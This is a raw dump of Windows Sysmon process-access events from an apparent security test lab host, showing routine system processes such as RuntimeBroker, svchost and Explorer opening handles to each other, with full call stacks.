12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.321{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.321{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa 10341000x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 